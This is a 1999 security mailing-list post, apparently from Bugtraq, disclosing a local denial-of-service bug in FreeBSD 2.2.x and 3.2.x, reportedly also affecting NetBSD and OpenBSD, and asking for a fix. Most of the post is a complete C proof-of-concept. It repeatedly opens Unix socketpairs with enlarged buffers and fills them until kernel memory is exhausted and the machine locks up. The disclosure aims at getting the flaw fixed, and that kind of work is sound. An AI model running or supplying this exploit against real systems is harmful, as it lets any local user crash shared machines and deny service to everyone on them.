Subject: Local DoS in FreeBSD
To: None <BUGTRAQ@SECURITYFOCUS.COM>
From: L. Sassaman <rabbi@QUICKIE.NET>
List: tech-net
Date: 08/27/1999 00:43:47
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
This was first posted to the FreeBSD security list on the 9th of August,
subsequently discussed on freebsd-stable and freebsd-hackers... no one
seems to care, even though it is able to lock up 2.2.6, 2.2.8, and 3.2.x
machines consistantly. I have also been told that it affects NetBSD and
OpenBSD, though I haven't confirmed it.
Someone with the know-how care to fix?
L. Sassaman
System Administrator | "Even the most primitive society has
Technology Consultant | an innate respect for the insane."
icq.. 10735603 |
pgp.. finger://ns.quickie.net/rabbi | --Mickey Rourke
- ---
#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>
#define BUFFERSIZE 204800
extern int
main(void)
{
int p[2], i;
char crap[BUFFERSIZE];
while (1)
{
if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
break;
i = BUFFERSIZE;
setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
fcntl(p[0], F_SETFL, O_NONBLOCK);
fcntl(p[1], F_SETFL, O_NONBLOCK);
write(p[0], crap, BUFFERSIZE);
write(p[1], crap, BUFFERSIZE);
}
return(0);
}
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v0.9.10 (GNU/Linux)
Comment: OpenPGP Encrypted Email Preferred.
iD8DBQE3xheKPYrxsgmsCmoRAiG+AJ9SbzLCXaYNkj/X7eg7uvljsSvATwCg+d91
TkVIqNdQpRi8CK9vySilouE=
=7ufs
-----END PGP SIGNATURE-----